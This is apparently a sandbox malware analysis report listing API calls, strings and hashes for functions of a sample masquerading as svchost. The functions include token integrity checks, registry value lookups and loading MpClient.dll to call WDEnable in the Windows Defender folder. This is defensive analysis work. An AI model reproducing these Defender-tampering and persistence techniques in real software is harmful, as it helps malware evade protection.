                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,75570F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                                • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                                • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4908
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                                • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                                • API String ID: 1998047302-3691563785
                                                                                                                                                                                                                • Opcode ID: 070f051068cf108f6ac8d6db46d2bdafb25315ddf0566f03980b57bdce55c427
                                                                                                                                                                                                                • Instruction ID: d8b115841d5c091acce9d9a813f0d02a609d9044164bb3ea084c23ad5a695ec5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 070f051068cf108f6ac8d6db46d2bdafb25315ddf0566f03980b57bdce55c427
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC31C471D40209AFEB20CBA5C888FEE7BB8FB44355F8884D8EB4567081E7789508CB60
                                                                                                                                                                                                                Function 004020E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                                • API String ID: 1010965793-1794910726
                                                                                                                                                                                                                • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                                • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                                Function 00402680 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                                • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                • String ID: Windows Explorer
                                                                                                                                                                                                                • API String ID: 1140695583-228612681
                                                                                                                                                                                                                • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                                • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                                Function 02BC2570 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75memorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC2587
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7556F550,00000000), ref: 02BC259E
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,7556F550,00000000), ref: 02BC25AB
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?,?,7556F550,00000000), ref: 02BC25E7
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(02C09F08,00000000,00000104,00000000,00000001,?,7556F550,00000000), ref: 02BC2611
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02BC2620
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,7556F550,00000000), ref: 02BC2623
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,7556F550,00000000), ref: 02BC2630
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,7556F550,00000000), ref: 02BC2633
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                                • String ID: 9e938de8a
                                                                                                                                                                                                                • API String ID: 780088666-94776983
                                                                                                                                                                                                                • Opcode ID: 9dbb76e8f308827b1752c4d35afe026d6fb98b8024b167208e19abd5d2b7768f
                                                                                                                                                                                                                • Instruction ID: ba57be0b6a028b7d7e3e7fe08f20b1a04dcb2f4b129eb11f6b97c965d30d6848
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dbb76e8f308827b1752c4d35afe026d6fb98b8024b167208e19abd5d2b7768f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26110671A8031467D770A6385C19FDB7B6CDB90B41F504594FA86AB1C0DFF19880CBE0
                                                                                                                                                                                                                Function 02BC4EA7 Relevance: 16.6, APIs: 11, Instructions: 77memorynetworkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 02BC4EFF
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02BC4F02
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F0F
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 02BC4F12
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F2A
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02BC4F2D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F3A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02BC4F3D
                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 02BC4F53
                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 02BC4F5D
                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 02BC4F67
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 278890334-0
                                                                                                                                                                                                                • Opcode ID: 2c686425698de2403f40b16b554f99eea468f0dd0307e8937ec7fcd08a892860
                                                                                                                                                                                                                • Instruction ID: cf9245de8cd8d9da76434fd6610c96fdf8c3b640081f8a1eccf4fd1b808d090e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c686425698de2403f40b16b554f99eea468f0dd0307e8937ec7fcd08a892860
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21F031A052146BDB209BB5AC58FEF7BBCEF48315F210899E649E3140DA70CA10CBA0
                                                                                                                                                                                                                Function 02BC4780 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125registrymemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC478A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC47C0
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02BC47E7
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02BC480A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02BC487D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4884
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4894
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02BC48C2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 1484339481-3673152959
                                                                                                                                                                                                                • Opcode ID: b71f6749c1284ee3d857510fc7bfbc60269354f3ca321a5477df5c303356efab
                                                                                                                                                                                                                • Instruction ID: c58da3e582630a2366f7ff15a14559b0d2f461616fd3c9762a6a8c5fe225898c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b71f6749c1284ee3d857510fc7bfbc60269354f3ca321a5477df5c303356efab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C411C329041D99BDB25CF659D28FDBBBB8EF81B44F1441D8EE44A7140D770A709CBA0
                                                                                                                                                                                                                Function 02BB3910 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SymGetModuleBase.DBGHELP(00000000,?,?,00000004), ref: 02BB3969
                                                                                                                                                                                                                • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02BB397C
                                                                                                                                                                                                                • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02BB3993
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB39BD
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB39E1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                                • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                                • API String ID: 844136142-2194319270
                                                                                                                                                                                                                • Opcode ID: dba257e986056fa52ba7f398e4c4a6a7197edc1146340f75abbb2a28b8cb1001
                                                                                                                                                                                                                • Instruction ID: a194af677cccbe824d24f2bd43b07e69aa8db3ed438e2e29214b96dcac3f596f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dba257e986056fa52ba7f398e4c4a6a7197edc1146340f75abbb2a28b8cb1001
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A21B1725402086BE7228A48DC85FFA77ACEF48745F44C5D5FE4A97101D7B09A588BA0
                                                                                                                                                                                                                Function 02BCA060 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCA068
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BCA227), ref: 02BCA09F
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(02BCA227,9e938cfca,00000000,?,00000000,?), ref: 02BCA0BC
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02BCA227), ref: 02BCA0C6
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BCA0F9
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,9e938cfca,00000000,?,00000000,?), ref: 02BCA116
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BCA120
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: 9e938cfca$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-3363573929
                                                                                                                                                                                                                • Opcode ID: 6f277beb46afed9ec01ca3a0d5c67a64547452e1b1453597688b58647e86cc22
                                                                                                                                                                                                                • Instruction ID: b36c2fa7cfca52b4eddb3fd9db32cd47d687dc15ef5b7814e57e07409f279eeb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f277beb46afed9ec01ca3a0d5c67a64547452e1b1453597688b58647e86cc22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD212C75E40209FBEB10DFA4CC95FEEBBB8EB48744F504599EA01E7180E7B4A6148B94
                                                                                                                                                                                                                Function 02BC36B0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC36B8
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02BC36EF
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,9E938CB4a,00000000,?,00000000,?), ref: 02BC370C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BC3716
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BC3749
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,9E938CB4a,00000000,?,00000000,?), ref: 02BC3766
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BC3770
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: 9E938CB4a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-1957466653
                                                                                                                                                                                                                • Opcode ID: f765742468255dee4e07ef6b74f033bde6cff856ab9b8af0897135fae83e7bdf
                                                                                                                                                                                                                • Instruction ID: 98ae6b11a15e2920a8d307366be80f179d44f40412deb0ba75f8291c18946f74
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f765742468255dee4e07ef6b74f033bde6cff856ab9b8af0897135fae83e7bdf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34212F75E50209FBEB10DFA4CC85FEEBBB8EB44744F90459AE601E7180E7B4A6148B94
                                                                                                                                                                                                                Function 02BB3420 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BB3428
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BC5B76), ref: 02BB345F
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(02BC5B76,9e938d6ea,00000000,?,00000000,?), ref: 02BB347C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(02BC5B76), ref: 02BB3486
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BB34B9
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,9e938d6ea,00000000,?,00000000,?), ref: 02BB34D6
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BB34E0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                                • String ID: 9e938d6ea$software\microsoft
                                                                                                                                                                                                                • API String ID: 2113243795-725738567
                                                                                                                                                                                                                • Opcode ID: 55657209f8c2fb1222556ab97be8c3477e03fbc9110b48fec410d11b417c9740
                                                                                                                                                                                                                • Instruction ID: f5e60f0043f19c802c7db146e6143c372454861dea08cf7c87325045705c5407
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55657209f8c2fb1222556ab97be8c3477e03fbc9110b48fec410d11b417c9740
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31212F75E40219FBEB20CBA4CC95FFEBBB8EF44744F504599E601E7180E7B4A6148B94
                                                                                                                                                                                                                Function 02BD9160 Relevance: 15.4, APIs: 8, Strings: 2, Instructions: 394COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: /$UT
                                                                                                                                                                                                                • API String ID: 0-1626504983
                                                                                                                                                                                                                • Opcode ID: 5af59ead32145cc0783355759dc52be3251962ca8526607d3887afedcd45220e
                                                                                                                                                                                                                • Instruction ID: 384bbae1b8cb9b404b4eb210d11321773e1088d8e39031f2b5da78fa9990b817
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5af59ead32145cc0783355759dc52be3251962ca8526607d3887afedcd45220e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25F1D475A046588BCF21CF68C8807EEBBB5FF44304F0485EAE948AB346E7719A85CF50
                                                                                                                                                                                                                Function 02BD9780 Relevance: 15.1, APIs: 10, Instructions: 97memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00004070,75570F00,00000000,75572F00,?,02BC3CE8,?), ref: 02BD9793
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,02BC3CE8,?), ref: 02BD9796
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD97AB
                                                                                                                                                                                                                • CreateFileA.KERNEL32(02BC3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02BC3CE8,?), ref: 02BD9802
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9825
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9828
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9834
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9837
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010,?,02BC3CE8,?), ref: 02BD984A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD984D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocAllocateCreateFileFreeValidatememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 529598968-0
                                                                                                                                                                                                                • Opcode ID: b88078d16f83a10816c7653fafe8fbad7c8754c8a56b9e7c1f7ce3349d5ea774
                                                                                                                                                                                                                • Instruction ID: 785a210e45ada4b6f28423c9e60d2a0336bd027667e1194c786277e53c058ec8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b88078d16f83a10816c7653fafe8fbad7c8754c8a56b9e7c1f7ce3349d5ea774
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34315EB1941B01DFD7309F669884B47FBE8FB48B94F418A7EE28997541D371A440CB60
                                                                                                                                                                                                                Function 02BC4630 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114registrymemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4664
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,00000000,00000000), ref: 02BC4687
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,00000000,00000000), ref: 02BC46AA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015,?,00000000,00000000), ref: 02BC471D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BC4724
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4734
